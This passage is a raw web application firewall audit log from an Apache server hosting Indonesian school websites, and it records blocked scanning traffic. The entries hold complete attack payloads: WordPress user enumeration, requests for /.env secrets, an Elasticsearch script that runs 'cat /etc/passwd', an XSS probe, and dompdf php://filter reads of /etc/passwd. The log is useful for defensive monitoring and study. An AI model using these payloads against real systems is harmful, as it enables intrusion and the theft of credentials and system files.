[line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748661730187534 2777 (- - -) Stopwatch2: 1748661730187534 2777; combined=1248, p1=425, p2=793, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb533b61-Z-- --6f67df3a-A-- [31/May/2025:10:29:40 +0700] aDp3pB_L2Rte6DjSjWYofQAAAJY 103.236.140.4 36594 103.236.140.4 8181 --6f67df3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 210.245.32.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 210.245.32.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6f67df3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f67df3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748662180882443 2542 (- - -) Stopwatch2: 1748662180882443 2542; combined=1152, p1=393, p2=731, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f67df3a-Z-- --88b29d49-A-- [31/May/2025:10:44:11 +0700] aDp7C-g1nD2n5twq7NsvrgAAAEU 103.236.140.4 36740 103.236.140.4 8181 --88b29d49-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.225.151.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.225.151.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --88b29d49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88b29d49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748663051459803 2797 (- - -) Stopwatch2: 1748663051459803 2797; combined=1237, p1=436, p2=772, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88b29d49-Z-- --55ac3a3a-A-- [31/May/2025:10:49:20 +0700] aDp8QOg1nD2n5twq7NsvsQAAAE8 103.236.140.4 36784 103.236.140.4 8181 --55ac3a3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.129.214.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.129.214.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --55ac3a3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55ac3a3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748663360305766 3053 (- - -) Stopwatch2: 1748663360305766 3053; combined=1369, p1=504, p2=836, p3=0, p4=0, p5=29, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55ac3a3a-Z-- --4e074b28-A-- [31/May/2025:10:49:27 +0700] aDp8R53Kgs4r2wz12c6FLAAAAAM 103.236.140.4 36790 103.236.140.4 8181 --4e074b28-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept-Charset: utf-8 --4e074b28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e074b28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748663367185739 802 (- - -) Stopwatch2: 1748663367185739 802; combined=327, p1=276, p2=0, p3=0, p4=0, p5=51, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e074b28-Z-- --49681a54-A-- [31/May/2025:10:58:52 +0700] aDp-fFbZTRMbIzLSWp6C3QAAAMM 103.236.140.4 36836 103.236.140.4 8181 --49681a54-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G930A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --49681a54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49681a54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748663932509269 840 (- - -) Stopwatch2: 1748663932509269 840; combined=338, p1=295, p2=0, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49681a54-Z-- --a41ac32f-A-- [31/May/2025:11:04:25 +0700] aDp_yeg1nD2n5twq7NsvugAAAEc 103.236.140.4 36904 103.236.140.4 8181 --a41ac32f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --a41ac32f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a41ac32f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748664265535884 787 (- - -) Stopwatch2: 1748664265535884 787; combined=312, p1=271, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a41ac32f-Z-- --7618e661-A-- [31/May/2025:11:06:56 +0700] aDqAYJ3Kgs4r2wz12c6FNQAAAAY 103.236.140.4 36914 103.236.140.4 8181 --7618e661-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.34.103.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.34.103.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7618e661-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7618e661-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748664416175716 3577 (- - -) Stopwatch2: 1748664416175716 3577; combined=1584, p1=594, p2=954, p3=0, p4=0, p5=36, sr=156, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7618e661-Z-- --1abae819-A-- [31/May/2025:11:46:15 +0700] aDqJl53Kgs4r2wz12c6FTgAAABg 103.236.140.4 37168 103.236.140.4 8181 --1abae819-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 8.1.0; en-US; Infinix X624B Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.13.0.1207 Mobile Safari/537.36 Accept-Charset: utf-8 --1abae819-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1abae819-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748666775192200 944 (- - -) Stopwatch2: 1748666775192200 944; combined=407, p1=365, p2=0, p3=0, p4=0, p5=42, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1abae819-Z-- --0005560c-A-- [31/May/2025:12:48:07 +0700] aDqYF53Kgs4r2wz12c6FbQAAAA0 103.236.140.4 37626 103.236.140.4 8181 --0005560c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 183.91.75.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 183.91.75.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0005560c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0005560c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748670487703155 3334 (- - -) Stopwatch2: 1748670487703155 3334; combined=1478, p1=479, p2=966, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0005560c-Z-- --dd243a6d-A-- [31/May/2025:12:56:27 +0700] aDqaC53Kgs4r2wz12c6GJwAAAAU 103.236.140.4 42070 103.236.140.4 8181 --dd243a6d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.251.89.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.251.89.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dd243a6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd243a6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748670987589916 2657 (- - -) Stopwatch2: 1748670987589916 2657; combined=1413, p1=476, p2=905, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd243a6d-Z-- --14311c41-A-- [31/May/2025:13:00:18 +0700] aDqa8p3Kgs4r2wz12c6G-AAAABg 103.236.140.4 44848 103.236.140.4 8181 --14311c41-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --14311c41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14311c41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748671218700690 861 (- - -) Stopwatch2: 1748671218700690 861; combined=328, p1=295, p2=0, p3=0, p4=0, p5=33, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14311c41-Z-- --ed667567-A-- [31/May/2025:13:40:27 +0700] aDqkW1bZTRMbIzLSWp6LyQAAAMI 103.236.140.4 47448 103.236.140.4 8181 --ed667567-B-- POST /_search?pretty HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 369 User-Agent: Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.3.1 Safari/605.1.15 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 198.252.110.114 Cookie: X-Varnish: 166811582 --ed667567-C-- { "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();" } } } --ed667567-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed667567-E-- --ed667567-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /_search?pretty"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673627626114 2674 (- - -) Stopwatch2: 1748673627626114 2674; combined=898, p1=458, p2=393, p3=0, p4=0, p5=46, sr=77, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed667567-Z-- --5bda0861-A-- [31/May/2025:13:40:28 +0700] aDqkXOg1nD2n5twq7Ns7vQAAAFY 103.236.140.4 47424 103.236.140.4 8181 --5bda0861-B-- GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15 Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 166811588 --5bda0861-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5bda0861-E-- --5bda0861-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "alert(document.domain)"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628464026 3094 (- - -) Stopwatch2: 1748673628464026 3094; combined=1380, p1=486, p2=855, p3=0, p4=0, p5=39, sr=95, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bda0861-Z-- --8055f719-A-- [31/May/2025:13:40:28 +0700] aDqkXFbZTRMbIzLSWp6LywAAAMo 103.236.140.4 47452 103.236.140.4 8181 --8055f719-B-- GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 153709557 --8055f719-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8055f719-E-- --8055f719-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628469288 1354 (- - -) Stopwatch2: 1748673628469288 1354; combined=415, p1=262, p2=97, p3=0, p4=0, p5=56, sr=54, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8055f719-Z-- --fa644f1a-A-- [31/May/2025:13:40:28 +0700] aDqkXJ3Kgs4r2wz12c6O9QAAABM 103.236.140.4 47440 103.236.140.4 8181 --fa644f1a-B-- GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 169192930 --fa644f1a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fa644f1a-E-- --fa644f1a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628469117 1654 (- - -) Stopwatch2: 1748673628469117 1654; combined=448, p1=273, p2=146, p3=0, p4=0, p5=28, sr=47, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa644f1a-Z-- --a71c270f-A-- [31/May/2025:13:40:28 +0700] aDqkXFbZTRMbIzLSWp6LzAAAAMw 103.236.140.4 47444 103.236.140.4 8181 --a71c270f-B-- GET /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 166811591 --a71c270f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a71c270f-E-- --a71c270f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628469537 1388 (- - -) Stopwatch2: 1748673628469537 1388; combined=334, p1=234, p2=72, p3=0, p4=0, p5=27, sr=43, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a71c270f-Z-- --f1239c2b-A-- [31/May/2025:13:40:28 +0700] aDqkXB_L2Rte6DjSjWYwSgAAAIs 103.236.140.4 47430 103.236.140.4 8181 --f1239c2b-B-- GET /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/129.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 166967378 --f1239c2b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f1239c2b-E-- --f1239c2b-H-- Message: Access denied with code 403 (phase 2). Match of 